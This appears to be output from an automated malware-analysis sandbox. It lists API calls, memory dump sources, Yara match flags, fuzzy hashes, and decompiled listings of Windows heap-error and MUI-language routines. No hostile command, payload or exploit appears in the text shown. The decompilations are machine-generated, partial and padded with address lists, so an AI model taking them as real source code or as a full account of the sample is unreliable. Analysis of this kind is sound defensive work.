                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                                          • Instruction ID: 33e441391f2a0b1e398b113c2e5be7578dcf48d956c97fd458980edbc3fb36c1
                                                          • Opcode Fuzzy Hash: bd1f1d00b990849b1b28ea03b0bda0963b0950482f732132c2dd7ed56697f344
                                                          • Instruction Fuzzy Hash: 4BE04F316002507BDB219BA48C89FD73FA89F4A750F1588A9B9999B242C570EA04C6D1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.761631200.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ca883191223df91ba1e7ff52d6bc22926cda686fe9fdd17004159eeb8d82ae9f
                                                          • Instruction ID: 0371c9277f5762863260abd5c705474c2f31f977e55873e57346959db4ce5f18
                                                          • Opcode Fuzzy Hash: ca883191223df91ba1e7ff52d6bc22926cda686fe9fdd17004159eeb8d82ae9f
                                                          • Instruction Fuzzy Hash: C8B02B71C010C0C7E601D3A006087173900BBC0304F13C021D2024350B8338C180F1B1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Strings
                                                          • an invalid address, %p, xrefs: 0191B4CF
                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0191B352
                                                          • The resource is owned shared by %d threads, xrefs: 0191B37E
                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0191B3D6
                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 0191B48F
                                                          • *** Inpage error in %ws:%s, xrefs: 0191B418
                                                          • Go determine why that thread has not released the critical section., xrefs: 0191B3C5
                                                          • The instruction at %p tried to %s , xrefs: 0191B4B6
                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0191B323
                                                          • write to, xrefs: 0191B4A6
                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0191B305
                                                          • This failed because of error %Ix., xrefs: 0191B446
                                                          • The resource is owned exclusively by thread %p, xrefs: 0191B374
                                                          • read from, xrefs: 0191B4AD, 0191B4B2
                                                          • The instruction at %p referenced memory at %p., xrefs: 0191B432
                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0191B53F
                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0191B476
                                                          • *** enter .exr %p for the exception record, xrefs: 0191B4F1
                                                          • a NULL pointer, xrefs: 0191B4E0
                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0191B314
                                                          • <unknown>, xrefs: 0191B27E, 0191B2D1, 0191B350, 0191B399, 0191B417, 0191B48E
                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0191B39B
                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0191B2DC
                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0191B2F3
                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0191B47D
                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0191B38F
                                                          • *** enter .cxr %p for the context, xrefs: 0191B50D
                                                          • *** then kb to get the faulting stack, xrefs: 0191B51C
                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0191B484
                                                          • The critical section is owned by thread %p., xrefs: 0191B3B9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                          • API String ID: 0-108210295
                                                          • Opcode ID: d6202d6f7bbb965b255ad88ccb34a01a6a5ee8e6a780fbd3617d1aac68d1d4c8
                                                          • Instruction ID: 260dc463764f396743a7d7b884889561c210bac742a493e1a09aa3e3af6f3859
                                                          • Opcode Fuzzy Hash: d6202d6f7bbb965b255ad88ccb34a01a6a5ee8e6a780fbd3617d1aac68d1d4c8
                                                          • Instruction Fuzzy Hash: A9812531A40204FFDB216B4A8C85D6B3F7BEF56B52F40404CFE099B256D2699691CBB3
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E01921C06() {
                                                          				signed int _t27;
                                                          				char* _t104;
                                                          				char* _t105;
                                                          				intOrPtr _t113;
                                                          				intOrPtr _t115;
                                                          				intOrPtr _t117;
                                                          				intOrPtr _t119;
                                                          				intOrPtr _t120;
                                                          
                                                          				_t105 = 0x18448a4;
                                                          				_t104 = "HEAP: ";
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E0186B150();
                                                          				} else {
                                                          					E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				_push( *0x195589c);
                                                          				E0186B150("Heap error detected at %p (heap handle %p)\n",  *0x19558a0);
                                                          				_t27 =  *0x1955898; // 0x0
                                                          				if(_t27 <= 0xf) {
                                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M01921E96))) {
                                                          						case 0:
                                                          							_t105 = "heap_failure_internal";
                                                          							goto L21;
                                                          						case 1:
                                                          							goto L21;
                                                          						case 2:
                                                          							goto L21;
                                                          						case 3:
                                                          							goto L21;
                                                          						case 4:
                                                          							goto L21;
                                                          						case 5:
                                                          							goto L21;
                                                          						case 6:
                                                          							goto L21;
                                                          						case 7:
                                                          							goto L21;
                                                          						case 8:
                                                          							goto L21;
                                                          						case 9:
                                                          							goto L21;
                                                          						case 0xa:
                                                          							goto L21;
                                                          						case 0xb:
                                                          							goto L21;
                                                          						case 0xc:
                                                          							goto L21;
                                                          						case 0xd:
                                                          							goto L21;
                                                          						case 0xe:
                                                          							goto L21;
                                                          						case 0xf:
                                                          							goto L21;
                                                          					}
                                                          				}
                                                          				L21:
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E0186B150();
                                                          				} else {
                                                          					E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				_push(_t105);
                                                          				E0186B150("Error code: %d - %s\n",  *0x1955898);
                                                          				_t113 =  *0x19558a4; // 0x0
                                                          				if(_t113 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E0186B150();
                                                          					} else {
                                                          						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E0186B150("Parameter1: %p\n",  *0x19558a4);
                                                          				}
                                                          				_t115 =  *0x19558a8; // 0x0
                                                          				if(_t115 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E0186B150();
                                                          					} else {
                                                          						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E0186B150("Parameter2: %p\n",  *0x19558a8);
                                                          				}
                                                          				_t117 =  *0x19558ac; // 0x0
                                                          				if(_t117 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E0186B150();
                                                          					} else {
                                                          						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E0186B150("Parameter3: %p\n",  *0x19558ac);
                                                          				}
                                                          				_t119 =  *0x19558b0; // 0x0
                                                          				if(_t119 != 0) {
                                                          					L41:
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E0186B150();
                                                          					} else {
                                                          						E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					_push( *0x19558b4);
                                                          					E0186B150("Last known valid blocks: before - %p, after - %p\n",  *0x19558b0);
                                                          				} else {
                                                          					_t120 =  *0x19558b4; // 0x0
                                                          					if(_t120 != 0) {
                                                          						goto L41;
                                                          					}
                                                          				}
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E0186B150();
                                                          				} else {
                                                          					E0186B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				return E0186B150("Stack trace available at %p\n", 0x19558c0);
                                                          			}











                                                          0x01921c10
                                                          0x01921c16
                                                          0x01921c1e
                                                          0x01921c3d
                                                          0x01921c3e
                                                          0x01921c20
                                                          0x01921c35
                                                          0x01921c3a
                                                          0x01921c44
                                                          0x01921c55
                                                          0x01921c5a
                                                          0x01921c65
                                                          0x01921c67
                                                          0x00000000
                                                          0x01921c6e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01921c67
                                                          0x01921cdc
                                                          0x01921ce5
                                                          0x01921d04
                                                          0x01921d05
                                                          0x01921ce7
                                                          0x01921cfc
                                                          0x01921d01
                                                          0x01921d0b
                                                          0x01921d17
                                                          0x01921d1f
                                                          0x01921d25
                                                          0x01921d30
                                                          0x01921d4f
                                                          0x01921d50
                                                          0x01921d32
                                                          0x01921d47
                                                          0x01921d4c
                                                          0x01921d61
                                                          0x01921d67
                                                          0x01921d68
                                                          0x01921d6e
                                                          0x01921d79
                                                          0x01921d98
                                                          0x01921d99
                                                          0x01921d7b
                                                          0x01921d90
                                                          0x01921d95
                                                          0x01921daa
                                                          0x01921db0
                                                          0x01921db1
                                                          0x01921db7
                                                          0x01921dc2
                                                          0x01921de1
                                                          0x01921de2
                                                          0x01921dc4
                                                          0x01921dd9
                                                          0x01921dde
                                                          0x01921df3
                                                          0x01921df9
                                                          0x01921dfa
                                                          0x01921e00
                                                          0x01921e0a
                                                          0x01921e13
                                                          0x01921e32
                                                          0x01921e33
                                                          0x01921e15
                                                          0x01921e2a
                                                          0x01921e2f
                                                          0x01921e39
                                                          0x01921e4a
                                                          0x01921e02
                                                          0x01921e02
                                                          0x01921e08
                                                          0x00000000
                                                          0x00000000
                                                          0x01921e08
                                                          0x01921e5b
                                                          0x01921e7a
                                                          0x01921e7b
                                                          0x01921e5d
                                                          0x01921e72
                                                          0x01921e77
                                                          0x01921e95

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                          • API String ID: 0-2897834094
                                                          • Opcode ID: cfde3f585427ac724ff7cd7f037ea698f9f19122459a0a63f8452324579c7e4d
                                                          • Instruction ID: c3e6156389cc70858896fc364fc68379e0688ee7578a61964e1ca3e523fb3f9b
                                                          • Opcode Fuzzy Hash: cfde3f585427ac724ff7cd7f037ea698f9f19122459a0a63f8452324579c7e4d
                                                          • Instruction Fuzzy Hash: BD61E737A15959EFD352EB49D884D30B3E8EB04B35709847AFA0DEB305D6249B50CB1B
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E01873D34(signed int* __ecx) {
                                                          				signed int* _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				signed int* _v20;
                                                          				char _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				char _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				signed int* _v48;
                                                          				signed int* _v52;
                                                          				signed int _v56;
                                                          				signed int _v60;
                                                          				char _v68;
                                                          				signed int _t140;
                                                          				signed int _t161;
                                                          				signed int* _t236;
                                                          				signed int* _t242;
                                                          				signed int* _t243;
                                                          				signed int* _t244;
                                                          				signed int* _t245;
                                                          				signed int _t255;
                                                          				void* _t257;
                                                          				signed int _t260;
                                                          				void* _t262;
                                                          				signed int _t264;
                                                          				void* _t267;
                                                          				signed int _t275;
                                                          				signed int* _t276;
                                                          				short* _t277;
                                                          				signed int* _t278;
                                                          				signed int* _t279;
                                                          				signed int* _t280;
                                                          				short* _t281;
                                                          				signed int* _t282;
                                                          				short* _t283;
                                                          				signed int* _t284;
                                                          				void* _t285;
                                                          
                                                          				_v60 = _v60 | 0xffffffff;
                                                          				_t280 = 0;
                                                          				_t242 = __ecx;
                                                          				_v52 = __ecx;
                                                          				_v8 = 0;
                                                          				_v20 = 0;
                                                          				_v40 = 0;
                                                          				_v28 = 0;
                                                          				_v32 = 0;
                                                          				_v44 = 0;
                                                          				_v56 = 0;
                                                          				_t275 = 0;
                                                          				_v16 = 0;
                                                          				if(__ecx == 0) {
                                                          					_t280 = 0xc000000d;
                                                          					_t140 = 0;
                                                          					L50:
                                                          					 *_t242 =  *_t242 | 0x00000800;
                                                          					_t242[0x13] = _t140;
                                                          					_t242[0x16] = _v40;
                                                          					_t242[0x18] = _v28;
                                                          					_t242[0x14] = _v32;
                                                          					_t242[0x17] = _t275;
                                                          					_t242[0x15] = _v44;
                                                          					_t242[0x11] = _v56;
                                                          					_t242[0x12] = _v60;
                                                          					return _t280;
                                                          				}
                                                          				if(E01871B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                          					_v56 = 1;
                                                          					if(_v8 != 0) {
                                                          						L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                          					}
                                                          					_v8 = _t280;
                                                          				}
                                                          				if(E01871B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                          					_v60 =  *_v8;
                                                          					L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                          					_v8 = _t280;
                                                          				}
                                                          				if(E01871B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                          					L16:
                                                          					if(E01871B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                          						L28:
                                                          						if(E01871B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                          							L46:
                                                          							_t275 = _v16;
                                                          							L47:
                                                          							_t161 = 0;
                                                          							L48:
                                                          							if(_v8 != 0) {
                                                          								L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                          							}
                                                          							_t140 = _v20;
                                                          							if(_t140 != 0) {
                                                          								if(_t275 != 0) {
                                                          									L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                          									_t275 = 0;
                                                          									_v28 = 0;
                                                          									_t140 = _v20;
                                                          								}
                                                          							}
                                                          							goto L50;
                                                          						}
                                                          						_t167 = _v12;
                                                          						_t255 = _v12 + 4;
                                                          						_v44 = _t255;
                                                          						if(_t255 == 0) {
                                                          							_t276 = _t280;
                                                          							_v32 = _t280;
                                                          						} else {
                                                          							_t276 = L01884620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                          							_t167 = _v12;
                                                          							_v32 = _t276;
                                                          						}
                                                          						if(_t276 == 0) {
                                                          							_v44 = _t280;
                                                          							_t280 = 0xc0000017;
                                                          							goto L46;
                                                          						} else {
                                                          							E018AF3E0(_t276, _v8, _t167);
                                                          							_v48 = _t276;
                                                          							_t277 = E018B1370(_t276, 0x1844e90);
                                                          							_pop(_t257);
                                                          							if(_t277 == 0) {
                                                          								L38:
                                                          								_t170 = _v48;
                                                          								if( *_v48 != 0) {
                                                          									E018ABB40(0,  &_v68, _t170);
                                                          									if(L018743C0( &_v68,  &_v24) != 0) {
                                                          										_t280 =  &(_t280[0]);
                                                          									}
                                                          								}
                                                          								if(_t280 == 0) {
                                                          									_t280 = 0;
                                                          									L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                          									_v44 = 0;
                                                          									_v32 = 0;
                                                          								} else {
                                                          									_t280 = 0;
                                                          								}
                                                          								_t174 = _v8;
                                                          								if(_v8 != 0) {
                                                          									L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                          								}
                                                          								_v8 = _t280;
                                                          								goto L46;
                                                          							}
                                                          							_t243 = _v48;
                                                          							do {
                                                          								 *_t277 = 0;
                                                          								_t278 = _t277 + 2;
                                                          								E018ABB40(_t257,  &_v68, _t243);
                                                          								if(L018743C0( &_v68,  &_v24) != 0) {
                                                          									_t280 =  &(_t280[0]);
                                                          								}
                                                          								_t243 = _t278;
                                                          								_t277 = E018B1370(_t278, 0x1844e90);
                                                          								_pop(_t257);
                                                          							} while (_t277 != 0);
                                                          							_v48 = _t243;
                                                          							_t242 = _v52;
                                                          							goto L38;
                                                          						}
                                                          					}
                                                          					_t191 = _v12;
                                                          					_t260 = _v12 + 4;
                                                          					_v28 = _t260;
                                                          					if(_t260 == 0) {
                                                          						_t275 = _t280;
                                                          						_v16 = _t280;
                                                          					} else {
                                                          						_t275 = L01884620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                          						_t191 = _v12;
                                                          						_v16 = _t275;
                                                          					}
                                                          					if(_t275 == 0) {
                                                          						_v28 = _t280;
                                                          						_t280 = 0xc0000017;
                                                          						goto L47;
                                                          					} else {
                                                          						E018AF3E0(_t275, _v8, _t191);
                                                          						_t285 = _t285 + 0xc;
                                                          						_v48 = _t275;
                                                          						_t279 = _t280;
                                                          						_t281 = E018B1370(_v16, 0x1844e90);
                                                          						_pop(_t262);
                                                          						if(_t281 != 0) {
                                                          							_t244 = _v48;
                                                          							do {
                                                          								 *_t281 = 0;
                                                          								_t282 = _t281 + 2;
                                                          								E018ABB40(_t262,  &_v68, _t244);
                                                          								if(L018743C0( &_v68,  &_v24) != 0) {
                                                          									_t279 =  &(_t279[0]);
                                                          								}
                                                          								_t244 = _t282;
                                                          								_t281 = E018B1370(_t282, 0x1844e90);
                                                          								_pop(_t262);
                                                          							} while (_t281 != 0);
                                                          							_v48 = _t244;
                                                          							_t242 = _v52;
                                                          						}
                                                          						_t201 = _v48;
                                                          						_t280 = 0;
                                                          						if( *_v48 != 0) {
                                                          							E018ABB40(_t262,  &_v68, _t201);
                                                          							if(L018743C0( &_v68,  &_v24) != 0) {
                                                          								_t279 =  &(_t279[0]);
                                                          							}
                                                          						}
                                                          						if(_t279 == 0) {
                                                          							L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                          							_v28 = _t280;
                                                          							_v16 = _t280;
                                                          						}
                                                          						_t202 = _v8;
                                                          						if(_v8 != 0) {
                                                          							L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                          						}
                                                          						_v8 = _t280;
                                                          						goto L28;
                                                          					}
                                                          				}
                                                          				_t214 = _v12;
                                                          				_t264 = _v12 + 4;
                                                          				_v40 = _t264;
                                                          				if(_t264 == 0) {
                                                          					_v20 = _t280;
                                                          				} else {
                                                          					_t236 = L01884620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                          					_t280 = _t236;
                                                          					_v20 = _t236;
                                                          					_t214 = _v12;
                                                          				}
                                                          				if(_t280 == 0) {
                                                          					_t161 = 0;
                                                          					_t280 = 0xc0000017;
                                                          					_v40 = 0;
                                                          					goto L48;
                                                          				} else {
                                                          					E018AF3E0(_t280, _v8, _t214);
                                                          					_t285 = _t285 + 0xc;
                                                          					_v48 = _t280;
                                                          					_t283 = E018B1370(_t280, 0x1844e90);
                                                          					_pop(_t267);
                                                          					if(_t283 != 0) {
                                                          						_t245 = _v48;
                                                          						do {
                                                          							 *_t283 = 0;
                                                          							_t284 = _t283 + 2;
                                                          							E018ABB40(_t267,  &_v68, _t245);
                                                          							if(L018743C0( &_v68,  &_v24) != 0) {
                                                          								_t275 = _t275 + 1;
                                                          							}
                                                          							_t245 = _t284;
                                                          							_t283 = E018B1370(_t284, 0x1844e90);
                                                          							_pop(_t267);
                                                          						} while (_t283 != 0);
                                                          						_v48 = _t245;
                                                          						_t242 = _v52;
                                                          					}
                                                          					_t224 = _v48;
                                                          					_t280 = 0;
                                                          					if( *_v48 != 0) {
                                                          						E018ABB40(_t267,  &_v68, _t224);
                                                          						if(L018743C0( &_v68,  &_v24) != 0) {
                                                          							_t275 = _t275 + 1;
                                                          						}
                                                          					}
                                                          					if(_t275 == 0) {
                                                          						L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                          						_v40 = _t280;
                                                          						_v20 = _t280;
                                                          					}
                                                          					_t225 = _v8;
                                                          					if(_v8 != 0) {
                                                          						L018877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                          					}
                                                          					_v8 = _t280;
                                                          					goto L16;
                                                          				}
                                                          			}










































                                                          0x01873d3c
                                                          0x01873d42
                                                          0x01873d44
                                                          0x01873d46
                                                          0x01873d49
                                                          0x01873d4c
                                                          0x01873d4f
                                                          0x01873d52
                                                          0x01873d55
                                                          0x01873d58
                                                          0x01873d5b
                                                          0x01873d5f
                                                          0x01873d61
                                                          0x01873d66
                                                          0x018c8213
                                                          0x018c8218
                                                          0x01874085
                                                          0x01874088
                                                          0x0187408e
                                                          0x01874094
                                                          0x0187409a
                                                          0x018740a0
                                                          0x018740a6
                                                          0x018740a9
                                                          0x018740af
                                                          0x018740b6
                                                          0x018740bd
                                                          0x018740bd
                                                          0x01873d83
                                                          0x018c821f
                                                          0x018c8229
                                                          0x018c8238
                                                          0x018c8238
                                                          0x018c823d
                                                          0x018c823d
                                                          0x01873da0
                                                          0x01873daf
                                                          0x01873db5
                                                          0x01873dba
                                                          0x01873dba
                                                          0x01873dd4
                                                          0x01873e94
                                                          0x01873eab
                                                          0x01873f6d
                                                          0x01873f84
                                                          0x0187406b
                                                          0x0187406b
                                                          0x0187406e
                                                          0x0187406e
                                                          0x01874070
                                                          0x01874074
                                                          0x018c8351
                                                          0x018c8351
                                                          0x0187407a
                                                          0x0187407f
                                                          0x018c835d
                                                          0x018c8370
                                                          0x018c8377
                                                          0x018c8379
                                                          0x018c837c
                                                          0x018c837c
                                                          0x018c835d
                                                          0x00000000
                                                          0x0187407f
                                                          0x01873f8a
                                                          0x01873f8d
                                                          0x01873f90
                                                          0x01873f95
                                                          0x018c830d
                                                          0x018c830f
                                                          0x01873f9b
                                                          0x01873fac
                                                          0x01873fae
                                                          0x01873fb1
                                                          0x01873fb1
                                                          0x01873fb6
                                                          0x018c8317
                                                          0x018c831a
                                                          0x00000000
                                                          0x01873fbc
                                                          0x01873fc1
                                                          0x01873fc9
                                                          0x01873fd7
                                                          0x01873fda
                                                          0x01873fdd
                                                          0x01874021
                                                          0x01874021
                                                          0x01874029
                                                          0x01874030
                                                          0x01874044
                                                          0x01874046
                                                          0x01874046
                                                          0x01874044
                                                          0x01874049
                                                          0x018c8327
                                                          0x018c8334
                                                          0x018c8339
                                                          0x018c833c
                                                          0x0187404f
                                                          0x0187404f
                                                          0x0187404f
                                                          0x01874051
                                                          0x01874056
                                                          0x01874063
                                                          0x01874063
                                                          0x01874068
                                                          0x00000000
                                                          0x01874068
                                                          0x01873fdf
                                                          0x01873fe2
                                                          0x01873fe4
                                                          0x01873fe7
                                                          0x01873fef
                                                          0x01874003
                                                          0x01874005
                                                          0x01874005
                                                          0x0187400c
                                                          0x01874013
                                                          0x01874016
                                                          0x01874017
                                                          0x0187401b
                                                          0x0187401e
                                                          0x00000000
                                                          0x0187401e
                                                          0x01873fb6
                                                          0x01873eb1
                                                          0x01873eb4
                                                          0x01873eb7
                                                          0x01873ebc
                                                          0x018c82a9
                                                          0x018c82ab
                                                          0x01873ec2
                                                          0x01873ed3
                                                          0x01873ed5
                                                          0x01873ed8
                                                          0x01873ed8
                                                          0x01873edd
                                                          0x018c82b3
                                                          0x018c82b6
                                                          0x00000000
                                                          0x01873ee3
                                                          0x01873ee8
                                                          0x01873eed
                                                          0x01873ef0
                                                          0x01873ef3
                                                          0x01873f02
                                                          0x01873f05
                                                          0x01873f08
                                                          0x018c82c0
                                                          0x018c82c3
                                                          0x018c82c5
                                                          0x018c82c8
                                                          0x018c82d0
                                                          0x018c82e4
                                                          0x018c82e6
                                                          0x018c82e6
                                                          0x018c82ed
                                                          0x018c82f4
                                                          0x018c82f7
                                                          0x018c82f8
                                                          0x018c82fc
                                                          0x018c82ff
                                                          0x018c82ff
                                                          0x01873f0e
                                                          0x01873f11
                                                          0x01873f16
                                                          0x01873f1d
                                                          0x01873f31
                                                          0x018c8307
                                                          0x018c8307
                                                          0x01873f31
                                                          0x01873f39
                                                          0x01873f48
                                                          0x01873f4d
                                                          0x01873f50
                                                          0x01873f50
